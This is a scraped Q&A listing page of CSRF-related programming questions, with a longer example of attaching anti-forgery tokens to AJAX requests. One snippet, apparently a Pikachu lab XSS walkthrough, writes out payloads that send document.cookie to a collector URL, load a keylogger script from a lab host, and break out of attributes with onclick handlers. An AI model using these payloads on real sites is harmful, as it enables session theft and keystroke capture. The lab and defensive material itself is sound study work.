csrf

include antiforgerytoken in ajax post ASP.NET MVC

馋奶兔 submitted on 2019-12-16 20:03:49
Question: I am having trouble with the AntiForgeryToken with ajax. I'm using ASP.NET MVC 3. I tried the solution in jQuery Ajax calls and the Html.AntiForgeryToken(). Using that solution, the token is now being passed: var data = { ... } // with token, key is '__RequestVerificationToken' $.ajax({ type: "POST", data: data, datatype: "json", traditional: true, contentType: "application/json; charset=utf-8", url: myURL, success: function (response) { ... }, error: function (response) { ... } }); When I

Security Testing Basics

这一生的挚爱 submitted on 2019-12-15 05:30:32
Reposting an article on security testing from the web. The reposted article is titled "安全测试基础(Ⅰ) 安全测试概述" (Security Testing Basics (I): Overview of Security Testing). Source: https://www.cnblogs.com/rd-ddddd/p/7718206.html#4367070 Generally, once functional testing of a release is finished, the corresponding test cases have been automated, and performance, compatibility and stability testing are done, we need to consider the security of the system, especially for modules that handle transactions, payments and user account data, where a security vulnerability carries very high risk. I. Security testing principles and common security threats: 1. Security requirements: ※ Authentication: respond to requests from authenticated users ※ Access control: restrict the permissions of unauthenticated users and protect data ※ Integrity: the user must receive exactly the information the server sent ※ Confidentiality: information must be delivered only to the intended users ※ Reliability: how frequent are failures? How long does the network take to recover from a failure? What measures are in place for a catastrophic failure? (In my own understanding this belongs more to fault-tolerance and disaster-recovery testing.) ※ Non-repudiation: the user should be able to prove that the data received came from a specific server 2. Common security test content: access control, SQL injection, URL security testing, XSS (cross-site scripting), CSRF (cross-site request forgery), URL redirect vulnerabilities, other security considerations. Next, we take a typical MVC website implemented in C# as an example and analyse each security testing angle in turn. II. Access control: access control is comparatively simple and comes up often in functional testing; the main points to consider are: 1. User permissions: suppose there are two users, A and B

Trying to use React/Ajax calls with Spring MVC and Thymeleaf

丶灬走出姿态 submitted on 2019-12-14 04:25:52
Question: According to the docs, I should be able to include the CSRF tokens in the header, grab them with jquery, and include them in the headers of my ajax calls. Unfortunately, including <html class='default' xmlns="http://www.w3.org/1999/xhtml" xmlns:th="http://www.thymeleaf.org"> <head> <meta charset='UTF-8'/> <meta http-equiv='X-UA-Compatible' content='IE=Edge,chrome=1' /> <meta name="_csrf" content="${_csrf.token}"/> <!-- default header name is X-CSRF-TOKEN --> <meta name="_csrf_header" content=

Is it necessary to protect JAX-RS requests against CSRF?

岁酱吖の submitted on 2019-12-14 03:45:47
Question: Is it necessary to protect JAX-RS requests against CSRF? By definition REST is stateless and therefore there exists no session id (session cookie), because there is no session at all (see also https://stackoverflow.com/a/15746639/5277820). My Spring Security Java Configuration: @Configuration @EnableWebSecurity public class SecurityConfig { @Configuration @Order(1) public static class JaxRsWebSecurityConfigurationAdapter extends WebSecurityConfigurerAdapter { @Override protected void configure

Multiple Django sites on the same domain - CSRF fails

↘锁芯ラ submitted on 2019-12-14 02:19:51
Question: I have two applications running on the same domain on different ports, both using csrf middleware. When I log in to one of the applications, all POST submits from the other fail. I presume this is because the SESSION_COOKIE_DOMAIN is the same. I tried changing SESSION_COOKIE_NAME; however, the 'csrftoken' cookie is used in the forms' POST requests on both sites, no matter that there now is a new cookie with the name I specified. When I post information with AJAX and get the csrf token from the cookie
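The ASP.NET MVC, Spring/Thymeleaf and Django posts above all come down to the same client-side step: find the anti-CSRF token the server-rendered page carries and put it where the server looks for it. The following is an added example, not code from any of those posts or from those frameworks. It handles the three carriers the posts mention (a hidden input named __RequestVerificationToken from @Html.AntiForgeryToken(), the _csrf and _csrf_header meta tags from Spring Security, and a cookie such as Django's csrftoken). The header name RequestVerificationToken for the MVC case is an assumption: the built-in [ValidateAntiForgeryToken] reads the form field, not a header, so a JSON body needs a server-side filter that reads the header instead. The stub document and cookie strings are constructed so the code runs under Node; in a page you would pass document and document.cookie.

```javascript
// Added example: locate a page's anti-CSRF token and attach it to a request
// as a header. Not from any of the posts above or from the frameworks.

// Read a cookie by exact name from a document.cookie-style string.
// Cookies are scoped by host, not port, so two apps on the same host that both
// use the name "csrftoken" overwrite each other's token (Django: set a distinct
// CSRF_COOKIE_NAME per app and pass that name here).
function cookieValue(cookieString, name) {
  for (const part of cookieString.split(';')) {
    const eq = part.indexOf('=');
    if (eq === -1) continue;
    if (part.slice(0, eq).trim() === name) {
      return decodeURIComponent(part.slice(eq + 1).trim());
    }
  }
  return null;
}

// Find the token and the header name the server expects, or null when the
// page carries no token at all (so the caller fails loudly instead of sending
// an unprotected request).
function findCsrfToken(doc, cookieString, cookieName) {
  // Spring Security + Thymeleaf: <meta name="_csrf"> and <meta name="_csrf_header">.
  const meta = doc.querySelector('meta[name="_csrf"]');
  if (meta) {
    const headerMeta = doc.querySelector('meta[name="_csrf_header"]');
    return {
      header: headerMeta ? headerMeta.getAttribute('content') : 'X-CSRF-TOKEN',
      token: meta.getAttribute('content'),
    };
  }
  // ASP.NET MVC: hidden input rendered by @Html.AntiForgeryToken().
  // Header name is an assumption; the server needs a filter that reads it.
  const hidden = doc.querySelector('input[name="__RequestVerificationToken"]');
  if (hidden) {
    return { header: 'RequestVerificationToken', token: hidden.getAttribute('value') };
  }
  // Django: token in a cookie, expected back in the X-CSRFToken header.
  const fromCookie = cookieValue(cookieString, cookieName);
  if (fromCookie !== null) {
    return { header: 'X-CSRFToken', token: fromCookie };
  }
  return null;
}

// Build the headers for a JSON POST. The token is resolved at call time rather
// than cached at page load, so a token the server has rotated is not reused.
function csrfHeaders(doc, cookieString, cookieName = 'csrftoken') {
  const found = findCsrfToken(doc, cookieString, cookieName);
  if (!found) throw new Error('no anti-CSRF token found on this page');
  return {
    'Content-Type': 'application/json; charset=utf-8',
    [found.header]: found.token,
  };
}

// Constructed stand-in for `document` so the example runs outside a browser.
function stubDocument(elements) {
  return {
    querySelector(selector) {
      const el = elements[selector];
      return el ? { getAttribute: (attr) => el[attr] } : null;
    },
  };
}

// Constructed sample pages, one per framework.
const springPage = stubDocument({
  'meta[name="_csrf"]': { content: 'tok-spring-1' },
  'meta[name="_csrf_header"]': { content: 'X-CSRF-TOKEN' },
});
const mvcPage = stubDocument({
  'input[name="__RequestVerificationToken"]': { value: 'tok-mvc-1' },
});
const djangoPage = stubDocument({});

// In a browser: fetch(url, { method: 'POST', credentials: 'same-origin',
//   headers: csrfHeaders(document, document.cookie), body: JSON.stringify(data) })
if (typeof require !== 'undefined' && require.main === module) {
  console.log(csrfHeaders(springPage, ''));
  console.log(csrfHeaders(mvcPage, ''));
  console.log(csrfHeaders(djangoPage, 'sessionid=abc; csrftoken=tok-dj-1'));
}
```

Sending the token in a header rather than in the JSON body is what lets the same client code work whether the body is JSON or form-encoded; the server side must then read that header.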

flask-wtforms component

点点圈 submitted on 2019-12-13 23:13:54
wtforms validates the format of data submitted by users; its functionality is the same as Django's Form. Features and key points: define a class; define fields (label/validate/default/choices...); hook functions; override __init__ and, inside __init__, fetch data from the database and assign it: self.hobby.choices = ...; using the class: form = Form() renders only the labels by default; form = Form(data={'name':'xx'}) renders labels plus default values (used for editing); form = Form(formdata=request.form) receives the data the user submitted, then if form.validate(): form.data else: form.errors. Installation: pip3 install wtforms. User login example: app.py from flask import Flask, render_template, request, redirect from wtforms import Form from wtforms.fields import core from wtforms.fields import html5 from wtforms.fields import simple from wtforms import validators from wtforms import widgets

xss csrf

柔情痞子 submitted on 2019-12-13 18:18:25
Reflected XSS (GET): the input has a length limit, so first change the maxlength to 99, then enter the payload; after submitting, an alert pops up. Viewing the source shows the payload has been written into the page. Reflected XSS (POST): first build a page that simulates the form submission, then use the payload <script>document.location = 'http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>, after which the cookies are collected. Stored XSS: first edit the rk.js file, then craft the payload <script src="http://192.168.171.129/pikachu/pkxss/rkeypress/rk.js"></script>; log in again and type sdafffffff; once the text is entered, the keystrokes are sent, and the back end shows the input was recorded. DOM XSS: the input becomes the content of a tag; based on the source, enter the payload ' onclick=alert("xss")> which closes the href attribute and at the same time sets a click handler that pops an alert. DOM XSS-s: the source shows that + is replaced by a space, so craft the payload ' onclick=alert("aqh")> and the alert pops as expected. Blind XSS: nothing is reflected back, so the guess is that the input is recorded on the back end; try the payload, then check the back end's image and the attack succeeded. XSS filtering: the filter strips script

How to prevent a cross site request forgery attack using an image URL?

强颜欢笑 submitted on 2019-12-13 14:28:16
Question: From ha.ckers.org/xss.html: IMG Embedded commands - this works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc.... This is one of the lesser used but more useful XSS vectors: <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables

Play Framework 2.6 CSRF and Session

做~自己de王妃 submitted on 2019-12-13 14:17:29
Question: I got a strange issue. I'm implementing cart functionality on my website and I use the session to store cart positions. I have a POST action to add a new position to the cart, and I have the CSRF filter enabled to secure the website. I call it with ajax on a product page, so the first call is okay, but the second says Unauthorized and in the logs there is [CSRF] Check failed because no token found in headers for /cart . But it has one. I call it with: $("form").submit(function(e){ e.preventDefault(); $.ajax({ url: '/cart',

Antiforgery token in a distributed SPA application

假如想象 submitted on 2019-12-13 09:12:22
Question: I am working on a distributed high-availability single-page application which gets served from a cluster of docker nodes. Occasionally a node will die (for perfectly valid reasons, so that is not the issue). All the clients then get seamlessly rerouted to one of the other nodes. Unfortunately, all of their XSRF tokens are then invalid, as they were stored in memory in the client. The question is, thus, how can we distribute storage of the current XSRF token(s) in a *nix based setup? Answer 1: To